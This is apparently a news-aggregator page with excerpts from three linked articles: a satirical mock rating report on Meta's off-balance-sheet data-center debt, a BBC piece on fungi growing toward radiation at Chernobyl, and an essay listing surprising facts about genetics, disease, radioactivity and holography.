something un-modeled happens, which we classify as “outside scope.”The RVG will remain enforceable, which matters more than the resale value of a hyperscale facility in a world where hyperscale facilities may or may not be worth anything.Changes in VIE or lease-accounting guidance will affect where Meta stores the debt, not whether Meta pays it.We could lower the rating if Meta were downgraded, if DSCR sagged below the range we pretend is acceptable, if Meta weakened its guarantees, or if events unfold in ways our assumptions did not account for, as events tend to do. The last category includes anything that would force us to revisit the assumptions we confidently made without testing.We view an upgrade as unlikely. The structure already performs the single miracle it was designed for: keeping $27.3 billion off Meta’s balance sheet in a manner we are professionally obligated to support.CONFIDENTIALITY AND USE: This report is intended solely for institutional investors, entities required by compliance to review documents they will not read, and any regulatory body still pretending to monitor off-balance-sheet arrangements. FSG LLC makes no representation, warranty, or faint gesture toward coherence regarding the accuracy, completeness, or legitimacy of anything contained herein. By reading this document, you irrevocably acknowledge that we did not perform due diligence in any conventional, philosophical, or legally enforceable sense. Our review consisted of rereading Meta’s press release until repetition produced acceptance, aided by a Magic 8-Ball we shook until it agreed.LIMITATION OF RELIANCE: Any resemblance to objective analysis is coincidental and should not be relied upon by anyone with fiduciary obligations, ethical standards, a working memory, or the ability to perform basic subtraction. Forward-looking statements are based on assumptions that will not survive contact with reality, stress testing, most Tuesdays, or a modest change in interest rates. FSG LLC is not liable for losses arising from reliance on this report, misunderstanding this report, fully understanding this report, or the sinking recognition that you should have known better. Past performance is not indicative of future results, except in the specific case of rating agencies repeating the same mistakes at larger scales with increasing confidence.RATING METHODOLOGY: The rating assigned herein may be revised, withdrawn, or denied ever existing if Meta consolidates the debt, Louisiana ceases to exist for tax purposes, or the data center becomes self-aware and moves to Montana to escape the heat. FSG LLC calculated the A+ rating using a proprietary model consisting of discounted cash flows, interpretive dance, and whatever number Meta’s CFO sounded comfortable with on a diligence call we did not in fact attend. Readers who discover material errors in this report are contractually obligated to keep them to themselves and accept that being technically correct is the least valuable form of correct.GENERAL PROVISIONS: By continuing to read, you consent to the proposition that what Meta does not consolidate does not exist, waive your right to say “I told you so” when this unravels, and accept that the term “investment grade” is now a disposition rather than a metric. FSG LLC reserves the right to amend, retract, deny, or disown this report at any time, particularly if Congress shows interest or someone notes that $27 billion off-balance-sheet is on a balance sheet somewhere. If you print this document, you may be required under applicable securities law to recycle it, shred it, or burn it before sunrise, whichever comes first. For questions, complaints, or sneaking suspicions, please do not contact us. We are unavailable indefinitely and have disabled our voicemail.
...
Read the original on stohl.substack.com »
The mould — formed from a number of different fungi — seemed to be doing something remarkable. It hadn’t just moved in because workers at the plant had left. Instead, Zhdanova had found in previous surveys of soil around Chernobyl that the fungi were actually growing towards the radioactive particles that littered the area. Now, she found that they had reached into the original source of the radiation, the rooms within the exploded reactor building.
With each survey taking her close to harmful radiation, Zhdanova’s work has also overturned our ideas about how radiation impacts life on Earth. Now her discovery offers hope of cleaning up radioactive sites and even provide ways of protecting astronauts from harmful radiation as they travel into space.
Eleven years before Zhdanova’s visit, a routine safety test of reactor four at the Chernobyl Nuclear Power Plant had quickly turned into the world’s worst nuclear accident. A series of errors both in the design of the reactor and its operation led to a huge explosion in the early hours of 26 April 1986. The result was a single, massive release of radionuclides. Radioactive iodine was a leading cause of death in the first days and weeks, and, later, of cancer.
In an attempt to reduce the risk of radiation poisoning and long-term health complications, a 30km (19 mile) exclusion zone — also known as the “zone of alienation” — was established to keep people at a distance from the worst of the radioactive remains of reactor four.
But while humans were kept away, Zhdanova’s black mould had slowly colonised the area.
...
Read the original on www.bbc.com »
That if you’re a life form and you cook up a baby and copy your genes to them, you’ll find that the genes have been degraded due to oxidative stress et al., which isn’t cause for celebration, but if you find some other hopefully-hot person and randomly swap in half of their genes, your baby will still be somewhat less fit compared to you and your hopefully-hot friend on average, but now there is variance, so if you cook up several babies, one of them might be as fit or even fitter than you, and that one will likely have more babies than your other babies have, and thus complex life can persist in a universe with increasing entropy.
That if we wanted to, we surely could figure out which of the 300-ish strains of rhinovirus are circulating in a given area at a given time and rapidly vaccinate people to stop it and thereby finally “cure” the common cold, and though this is too annoying to pursue right now, it seems like it’s just a matter of time.
That if you look back at history, you see that plagues went from Europe to the Americas but not the other way, which suggests that urbanization and travel are great allies for infectious disease, and these both continue today but are held in check by sanitation and vaccines even while we have lots of tricks like UVC light and high-frequency sound and air filtration and waste monitoring and paying people to stay home that we’ve barely even put in play.
That while engineered infectious diseases loom ever-larger as a potential very big problem, we also have lots of crazier tricks we could pull out like panopticon viral screening or toilet monitors or daily individualized saliva sampling or engineered microbe-resistant surfaces or even dividing society into cells with rotating interlocks or having people walk around in little personal spacesuits, and while admittedly most of this doesn’t sound awesome, I see no reason this shouldn’t be a battle that we would win.
That radioactive atoms either release a ton of energy but also quickly stop existing—a gram of Rubidium-90 scattered around your kitchen emits as much energy as ~200,000 incandescent lightbulbs but after an hour only 0.000000113g is left—or don’t put out very much energy but keep existing for a long time—a gram of Carbon-14 only puts out the equivalent of 0.0000212 light bulbs but if you start with a gram, you’ll still have 0.999879g after a year—so it isn’t actually that easy to permanently poison the environment with radiation although Cobalt-60 with its medium energy output and medium half-life is unfortunate, medical applications notwithstanding I still wish Cobalt-60 didn’t exist, screw you Cobalt-60.
That while curing all cancer would only increase life expectancy by ~3 years and curing all heart disease would only increase life expectancy by ~3 years, and preventing all accidents would only increase life expectancy by ~1.5 years, if we did all of these at the same time and then a lot of other stuff too, eventually the effects would go nonlinear, so trying to cure cancer isn’t actually a waste of time, thankfully.
That sleep, that probably evolution first made a low-energy mode so we don’t starve so fast and then layered on some maintenance processes, but the effect is that we live in a cycle and when things aren’t going your way it’s comforting that reality doesn’t stretch out before you indefinitely but instead you can look forward to a reset and a pause that’s somehow neither experienced nor skipped.
That every expression graph built from differentiable elementary functions and producing a scalar output has a gradient that can itself be written as an expression graph, and furthermore that the latter expression graph is always the same size as the first one and is easy to find, and thus that it’s possible to fit very large expression graphs to data.
That if you look at something and move your head around, you observe the entire light field, which is a five-dimensional function of three spatial coordinates and two angles, and yet if you do something fancy with lasers, somehow that entire light field can be stored on a single piece of normal two-dimensional film and then replayed later.
That, as far as I can tell, the reason five-dimensional light fields can be stored on two-dimensional film simply cannot be explained without quite a lot of wave mechanics, a vivid example of the strangeness of this place and proof that all those physicists with their diffractions and phase conjugations really are up to something.
That if you were in two dimensions and you tried to eat something then maybe your body would split into two pieces since the whole path from mouth to anus would have to be disconnected, so be thankful you’re in three dimensions, although maybe you could have some kind of jigsaw-shaped digestive tract so your two pieces would only jiggle around or maybe you could use the same orifice for both purposes, remember that if you ever find yourself in two dimensions, I guess.
...
Read the original on dynomight.net »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.